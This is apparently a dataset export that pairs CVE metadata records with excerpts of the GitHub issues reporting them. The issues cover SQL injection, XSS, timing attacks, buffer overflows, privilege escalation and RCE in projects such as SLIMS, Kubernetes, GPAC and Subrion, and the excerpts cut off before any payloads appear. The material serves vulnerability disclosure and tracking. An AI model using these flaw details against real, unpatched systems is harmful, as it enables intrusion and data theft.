A memory leak flaw was found in ruby-magick, an interface between Ruby and ImageMagick. This issue can lead to a denial of service (DOS) by memory exhaustion.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integ...
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2023-5349" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/s...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rmagick:rmagick:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "B9093FAF-BBDD-4BAD-9274-6896A5F0BF47", "versionEndExcluding": "5.3.0", "versionEndIncluding": null, "versionStartExcl...
[ "401" ]
401
https://github.com/rmagick/rmagick/issues/1401
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rmagick", "rmagick" ]
### Description Long running ruby process creating images with rmagick consumes massive amounts of memory since most recent ImageMagick-6.9.12-90.tar.gz release. ### Steps to Reproduce Install latest imagemagick@6 (https://formulae.brew.sh/api/formula/imagemagick@6.json) and install rmagick 5.2.0. Long running ru...
Huge memory consumption with latest imagemagick@6 update
https://api.github.com/repos/rmagick/rmagick/issues/1401/comments
29
2023-07-07T13:47:42Z
2025-03-28T16:58:00Z
https://github.com/rmagick/rmagick/issues/1401
1,793,583,138
1,401
5,711
CVE-2015-20110
2023-10-31T03:15:07.613
JHipster generator-jhipster before 2.23.0 allows a timing attack against validateToken due to a string comparison that stops at the first character that is different. Attackers can guess tokens by brute forcing one character at a time and observing the timing. This of course drastically reduces the search space to a li...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/jhipster/generator-jhipster/commit/79fe5626cb1bb80f9ac86cf46980748e65d2bdbc" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/jhipster/generator-jhipster/commit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jhipster:jhipster:*:*:*:*:*:*:*:*", "matchCriteriaId": "975D9B1E-D46A-4E51-9190-4A5C1F050EB6", "versionEndExcluding": "2.23.0", "versionEndIncluding": null, "versionStartExcl...
[ "307" ]
307
https://github.com/jhipster/generator-jhipster/issues/2095
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jhipster", "generator-jhipster" ]
The TokenProvider uses `String.equals(str)` to compare the given token-signature with a calculated one. This method uses a break-on-inequality algorithm. This makes the TokenProvider vulnerable to timing attacks, where an attacker can forge a token with any username more easily than using brute force. [Coda Hale did a...
Security: TokenProvider vulnerable to timing attacks
https://api.github.com/repos/jhipster/generator-jhipster/issues/2095/comments
6
2015-10-06T16:05:56Z
2016-08-12T02:42:34Z
https://github.com/jhipster/generator-jhipster/issues/2095
110,043,433
2,095
5,712
CVE-2023-45996
2023-10-31T06:15:07.883
SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-member_type.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vend...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "BA26D88B-C9C8-4F63-9953-F4F2520AD952", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/216
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
# The Bug A SQL Injection has found in `admin/modules/membership/member_type.php` at the code below ``` $data['member_type_name'] = $dbs->escape_string($memberTypeName); $data['loan_limit'] = trim($_POST['loanLimit']); $data['loan_periode'] = trim($_POST['loanPeriode']); $data['enable_reserve'] = $_POST['enable...
Vuln0wned Report: SQL Injection in member_type.php
https://api.github.com/repos/slims/slims9_bulian/issues/216/comments
3
2023-10-08T16:42:47Z
2025-01-01T11:05:28Z
https://github.com/slims/slims9_bulian/issues/216
1,931,906,656
216
5,713
CVE-2023-3676
2023-10-31T21:15:08.550
A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119339" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "h...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FF4C81ED-BB69-490B-BABA-89C2501A5E6D", "versionEndExcluding": "1.24.17", "versionEndIncluding": null, "versionStar...
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/119339
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (8.8) A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those no...
CVE-2023-3676: Insufficient input sanitization on Windows nodes leads to privilege escalation
https://api.github.com/repos/kubernetes/kubernetes/issues/119339/comments
3
2023-07-14T18:27:48Z
2023-10-31T20:30:00Z
https://github.com/kubernetes/kubernetes/issues/119339
1,805,330,606
119,339
5,714
CVE-2023-3955
2023-10-31T21:15:08.613
A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119595" }, { "source": "jordan@liggitt.net", "tags": [ "Technical Description" ], "url": "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FF4C81ED-BB69-490B-BABA-89C2501A5E6D", "versionEndExcluding": "1.24.17", "versionEndIncluding": null, "versionStar...
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/119595
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/av:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (8.8) A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those no...
CVE-2023-3955: Insufficient input sanitization on Windows nodes leads to privilege escalation
https://api.github.com/repos/kubernetes/kubernetes/issues/119595/comments
2
2023-07-26T15:30:50Z
2023-11-01T00:33:34Z
https://github.com/kubernetes/kubernetes/issues/119595
1,822,677,454
119,595
5,715
CVE-2023-46930
2023-11-01T14:15:38.250
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a SEGV in gpac/MP4Box in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/3809955065afa3da1ad580012ec43deadbb0f2c8" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/2666
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# SEGV in MP4Box ### Description SEGV in gpac/MP4Box. #0 0x7ffff6697edd in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14 ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io ...
SEGV in gpac/MP4Box in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14
https://api.github.com/repos/gpac/gpac/issues/2666/comments
0
2023-10-25T06:06:04Z
2023-10-26T10:37:04Z
https://github.com/gpac/gpac/issues/2666
1,960,612,139
2,666
5,716
CVE-2023-46931
2023-11-01T14:15:38.640
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a heap-buffer-overflow in ffdmx_parse_side_data /afltest/gpac/src/filters/ff_dmx.c:202:14 in gpac/MP4Box.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/671976fccc971b3dff8d3dcf6ebd600472ca64bf." }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/2664
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# heap-buffer-overflow in ffdmx_parse_side_data /afltest/gpac/src/filters/ff_dmx.c:202:14 in gpac/gpac ### Description Heap-buffer-overflow in MP4Box. ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Pl...
heap-buffer-overflow in ffdmx_parse_side_data /afltest/gpac/src/filters/ff_dmx.c:202:14 in gpac/MP4Box
https://api.github.com/repos/gpac/gpac/issues/2664/comments
0
2023-10-24T13:31:01Z
2023-10-26T10:37:05Z
https://github.com/gpac/gpac/issues/2664
1,959,261,781
2,664
5,717
CVE-2023-46927
2023-11-01T15:15:08.707
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a heap-buffer-overflow in gf_isom_use_compact_size gpac/src/isomedia/isom_write.c:3403:3 in gpac/MP4Box.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/a7b467b151d9b54badbc4dd71e7a366b7c391817" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/2657
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# heap-buffer-overflow in gf_isom_use_compact_size gpac/src/isomedia/isom_write.c:3403:3 in gpac/gpac ### Description Heap-buffer-overflow in MP4Box. ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Ple...
heap-buffer-overflow in gf_isom_use_compact_size gpac/src/isomedia/isom_write.c:3403:3 in gpac/gpac
https://api.github.com/repos/gpac/gpac/issues/2657/comments
0
2023-10-22T20:14:14Z
2023-10-23T13:23:29Z
https://github.com/gpac/gpac/issues/2657
1,956,040,458
2,657
5,718
CVE-2023-46928
2023-11-01T15:15:08.753
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a SEGV in gpac/MP4Box in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/0753bf6d867343a80a044bf47a27d0b7accc8bf1" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/2661
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# SEGV in MP4Box ### Description SEGV in gpac/MP4Box. #0 0x7ffff6798224 in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42 ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Pleas...
SEGV in gpac/MP4Box in gf_media_change_pl /afltest/gpac/src/media_tools/isom_tools.c:3293:42
https://api.github.com/repos/gpac/gpac/issues/2661/comments
0
2023-10-24T08:08:44Z
2023-10-26T10:37:05Z
https://github.com/gpac/gpac/issues/2661
1,958,731,162
2,661
5,719
CVE-2023-5916
2023-11-02T11:15:14.540
A vulnerability classified as critical has been found in Lissy93 Dashy 2.1.1. This affects an unknown part of the file /config-manager/save of the component Configuration Handler. The manipulation of the argument config leads to improper access controls. It is possible to initiate the attack remotely. The exploit has b...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", ...
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Lissy93/dashy/issues/1336" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://treasure-blarney-085.notion.site/Dashy-0dca8a0ebbd84f78ae6d03528ff1...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dashy:dashy:2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "43ECA239-B554-4FF1-BDA4-CF648B2387CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "284" ]
284
https://github.com/Lissy93/dashy/issues/1336
[ "Exploit", "Issue Tracking" ]
github.com
[ "Lissy93", "dashy" ]
### Environment Self-Hosted (Docker) ### System _No response_ ### Version 2.1.1 ### Describe the problem the "disableConfiguration" has set to "true" but the configuration is able to change via http request ![651946e662acb](https://github.com/Lissy93/dashy/assets/59787869/6738e7b3-a5c2-4941-88c0-9cee3181d794)...
[BUG] Unauthorized access
https://api.github.com/repos/Lissy93/dashy/issues/1336/comments
2
2023-10-01T10:53:58Z
2024-02-04T11:48:14Z
https://github.com/Lissy93/dashy/issues/1336
1,920,701,292
1,336
5,720
CVE-2023-46925
2023-11-02T17:15:11.567
Reportico 7.1.21 is vulnerable to Cross Site Scripting (XSS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/reportico-web/reportico/issues/47" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:reportico:reportico:7.1.21:*:*:*:*:*:*:*", "matchCriteriaId": "36090B19-CD3B-42FD-BDB2-C30FA144EDD0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "79" ]
79
https://github.com/reportico-web/reportico/issues/47
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "reportico-web", "reportico" ]
Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to inject code, (typically HTML or JavaScript), into the contents of an outside website. When a victim views an infected page on the website, the injected code executes in the victim’s browser. Consequently, the attacker has bypassed...
Reflected XSS in Reportico-7.1
https://api.github.com/repos/reportico-web/reportico/issues/47/comments
4
2022-05-17T10:58:47Z
2023-07-06T12:17:22Z
https://github.com/reportico-web/reportico/issues/47
1,238,463,044
47
5,721
CVE-2023-31579
2023-11-02T22:15:08.640
Dromara Lamp-Cloud before v3.8.1 was discovered to use a hardcoded cryptographic key when creating and verifying a Json Web Token. This vulnerability allows attackers to authenticate to the application via a crafted JWT token.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/dromara/lamp-cloud/issues/183" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/xubowenW/JWTissu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tangyh:lamp-cloud:*:*:*:*:*:*:*:*", "matchCriteriaId": "D2219072-7E2E-4806-9D8B-32064FA47067", "versionEndExcluding": "3.8.1", "versionEndIncluding": null, "versionStartExclu...
[ "798" ]
798
https://github.com/dromara/lamp-cloud/issues/183
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "dromara", "lamp-cloud" ]
# 版本信息: JDK 版本(必填) : -- 源码版本(必填):3.7.0 MySQL(必填):-- Nacos(必填):-- # 问题描述: Hi, we are a research group to help developers build secure applications. We designed a cryptographic misuse detector on Java language. We found your great public repository (i.e., lamp-cloud) from Github, and several security issues det...
Using predictable/constant cryptographic key when creating and verifing Json Web Token.
https://api.github.com/repos/dromara/lamp-cloud/issues/183/comments
4
2022-09-05T07:52:22Z
2023-08-24T01:41:03Z
https://github.com/dromara/lamp-cloud/issues/183
1,361,544,458
183
5,722
CVE-2023-42299
2023-11-02T22:15:09.113
Buffer Overflow vulnerability in OpenImageIO oiio v.2.4.12.0 allows a remote attacker to execute arbitrary code and cause a denial of service via the read_subimage_data function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/OpenImageIO/oiio/issues/3840" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openimageio:openimageio:2.4.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "28795C4C-8800-499D-8C41-5B27C2745310", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "120" ]
120
https://github.com/OpenImageIO/oiio/issues/3840
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "OpenImageIO", "oiio" ]
Describe the bug: Hi, I found heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368. To Reproduce: Steps to reproduce the behavior: 1. CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit...
heap-buffer-overflow in file src/gif.imageio/gifinput.cpp, line 368
https://api.github.com/repos/AcademySoftwareFoundation/OpenImageIO/issues/3840/comments
13
2023-05-15T11:55:43Z
2024-09-05T17:39:38Z
https://github.com/AcademySoftwareFoundation/OpenImageIO/issues/3840
1,709,938,318
3,840
5,723
CVE-2023-46947
2023-11-03T13:15:08.797
Subrion 4.2.1 has a remote command execution vulnerability in the backend.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/909" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion:4.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "E9C1813C-DBF7-4ADF-8FC0-23608A417D29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "94" ]
94
https://github.com/intelliants/subrion/issues/909
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
## There is a remote command execution vulnerability ### Affected version - subrion 4.2.1 lates ### login address ~~~ text http://127.0.0.1/panel ~~~ Find `PHP info` in the `System` module ![image-20231026102809757](https://github.com/intelliants/subrion/assets/56108892/3457da55-dd71-4d22-bd97-048b9...
There is a RCE vulnerability
https://api.github.com/repos/intelliants/subrion/issues/909/comments
1
2023-10-26T04:59:32Z
2024-12-03T05:23:41Z
https://github.com/intelliants/subrion/issues/909
1,962,706,841
909
5,724
CVE-2023-3893
2023-11-03T18:15:08.623
A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes running kubernetes-csi-proxy may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes running kubernetes-csi-proxy.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119594" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-sec...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:csi_proxy:*:*:*:*:*:*:*:*", "matchCriteriaId": "1A1845E5-AD91-4083-8836-4C0E4547C5A4", "versionEndExcluding": null, "versionEndIncluding": "1.1.2", "versionStartEx...
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/119594
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/av:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (8.8) A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes running kubernetes-csi-proxy may be able to escalate to...
CVE-2023-3893: Insufficient input sanitization on kubernetes-csi-proxy leads to privilege escalation
https://api.github.com/repos/kubernetes/kubernetes/issues/119594/comments
5
2023-07-26T15:30:26Z
2023-11-04T16:10:06Z
https://github.com/kubernetes/kubernetes/issues/119594
1,822,676,744
119,594
5,725
CVE-2022-3172
2023-11-03T20:15:08.550
A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client's API server credentials to third parties.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/112513" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-sec...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:apiserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "D740494E-6332-4421-BE43-C0CEB179CBA6", "versionEndExcluding": null, "versionEndIncluding": "1.21.14", "versionStart...
[ "918" ]
918
https://github.com/kubernetes/kubernetes/issues/112513
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L) (5.1, medium) A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the clien...
CVE-2022-3172: Aggregated API server can cause clients to be redirected (SSRF)
https://api.github.com/repos/kubernetes/kubernetes/issues/112513/comments
4
2022-09-16T13:14:50Z
2022-11-10T03:57:00Z
https://github.com/kubernetes/kubernetes/issues/112513
1,375,935,782
112,513
5,726
CVE-2023-40660
2023-11-06T17:15:11.757
A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanent...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "int...
[ { "source": "secalert@redhat.com", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2023:7876" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2023:7879" }, { "source": "secalert@redhat.com", "tags": [ "Third ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6722AEB-DDA9-49E4-9D5C-FBE1F15230AF", "versionEndExcluding": null, "versionEndIncluding": "0.23.0", "versionStart...
[ "287" ]
287
https://github.com/OpenSC/OpenSC/issues/2792#issuecomment-1674806651
[ "Issue Tracking" ]
github.com
[ "OpenSC", "OpenSC" ]
https://github.com/OpenSC/OpenSC/compare/0.23.0...master shows +250 commits since last release. Amongst those commits are some critical fixes. Do you have any plans to release new version soon? 🤔
New release 0.24.0
https://api.github.com/repos/OpenSC/OpenSC/issues/2792/comments
26
2023-06-02T11:38:07Z
2023-12-13T11:29:55Z
https://github.com/OpenSC/OpenSC/issues/2792
1,738,037,344
2,792
5,727
CVE-2023-47004
2023-11-06T22:15:08.043
Buffer Overflow vulnerability in Redis RedisGraph v.2.x through v.2.12.8 and fixed in v.2.12.9 allows an attacker to execute arbitrary code via the code logic after valid authentication.
